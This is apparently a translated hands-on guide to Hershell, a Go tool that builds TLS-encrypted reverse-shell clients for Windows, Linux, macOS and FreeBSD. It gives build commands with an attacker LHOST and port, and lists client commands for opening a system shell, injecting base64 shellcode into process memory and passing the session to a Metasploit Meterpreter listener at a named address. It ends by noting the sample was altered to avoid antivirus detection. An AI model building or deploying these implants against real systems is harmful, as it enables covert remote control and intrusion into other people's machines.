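Hershell is a multi-platform reverse shell generator written in Go. It encrypts its traffic with TLS and supports pinning the certificate's public key fingerprint to prevent traffic interception.
Supported systems: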
- mac
- linux
- windows
- FreeBSD and its derivatives
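The public key fingerprint pinning mentioned above is why a TLS-inspection proxy that re-signs the session makes the connection fail instead of exposing the traffic. The sketch below is an added example, not Hershell's own code; it assumes the pin is a SHA-256 hash of the certificate's SubjectPublicKeyInfo, and the function names and throwaway certificates are constructed for illustration.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"fmt"
	"math/big"
	"time"
)

// spkiFingerprint parses a DER certificate and hashes its SubjectPublicKeyInfo (assumed pin format).
func spkiFingerprint(der []byte) ([]byte, error) {
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		return nil, err
	}
	sum := sha256.Sum256(cert.RawSubjectPublicKeyInfo)
	return sum[:], nil
}

// verifyPinned returns a callback with the signature of tls.Config.VerifyPeerCertificate.
func verifyPinned(pin []byte) func([][]byte, [][]*x509.Certificate) error {
	return func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
		if len(rawCerts) == 0 {
			return fmt.Errorf("no peer certificate presented")
		}
		got, err := spkiFingerprint(rawCerts[0])
		if err != nil || !bytes.Equal(got, pin) {
			return fmt.Errorf("peer key fingerprint %x does not match pin (parse error: %v)", got, err)
		}
		return nil
	}
}

// selfSigned builds a constructed, throwaway self-signed certificate with a fresh key (sample input).
func selfSigned() []byte {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	tmpl := &x509.Certificate{SerialNumber: big.NewInt(1), NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(time.Hour)}
	der, _ := x509.CreateCertificate(rand.Reader, tmpl, tmpl, pub, priv)
	return der
}

func main() {
	good, proxy := selfSigned(), selfSigned() // proxy stands in for a certificate re-issued by an inspection device
	pin, _ := spkiFingerprint(good)
	fmt.Println(verifyPinned(pin)([][]byte{good}, nil), verifyPinned(pin)([][]byte{proxy}, nil))
}
```

Because the check depends only on the key, a certificate re-issued with the same key still matches, while any certificate substituted by an interception device does not.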
To install Hershell (with a Go environment already installed), run go get github.com/lesnuages/hershell to fetch the project, or pull it locally with git clone. The tool's parameters are:
- GOOS : the target OS
- GOARCH : the target architecture
- LHOST : the attacker IP or domain name
- LPORT : the listener port
- depends : generate the server certificate (required for the reverse shell)
- windows32 : builds a windows 32 bits executable (PE 32 bits)
- windows64 : builds a windows 64 bits executable (PE 64 bits)
- linux32 : builds a linux 32 bits executable (ELF 32 bits)
- linux64 : builds a linux 64 bits executable (ELF 64 bits)
- macos32 : builds a mac os 32 bits executable (Mach-O)
- macos64 : builds a mac os 64 bits executable (Mach-O)
Some additional notes:
- run_shell : drops you into a system shell (allowing you, for example, to change directories)
- inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it
- meterpreter [tcp|http|https] IP:PORT : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
- exit : exit gracefully
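Hands-on:
First, generate a certificate:
```
make depends
```
Taking Windows as an example, build a client; other platforms work the same way:
```
make windows64 LHOST=192.168.0.12 LPORT=1234
```
Then start a listener. Any of the following programs can be used: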
- socat
- ncat
- openssl server module
- metasploit multi handler(python/shell_reverse_tcp_ssl payload)
Taking ncat as an example:
After getting a shell, the session can also be passed to msf. The following msf payloads are supported:
- windows/meterpreter/reverse_tcp
- windows/x64/meterpreter/reverse_tcp
- windows/meterpreter/reverse_http
- windows/x64/meterpreter/reverse_http
- windows/meterpreter/reverse_https
- windows/x64/meterpreter/reverse_https
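First, start the listener in msf:
Then pass the session from hershell:
```
[hershell]> meterpreter https 172.16.122.105:8443
```
msf receives the shell.
The antivirus detection results are as follows (the sample has been processed to avoid the sample being killed):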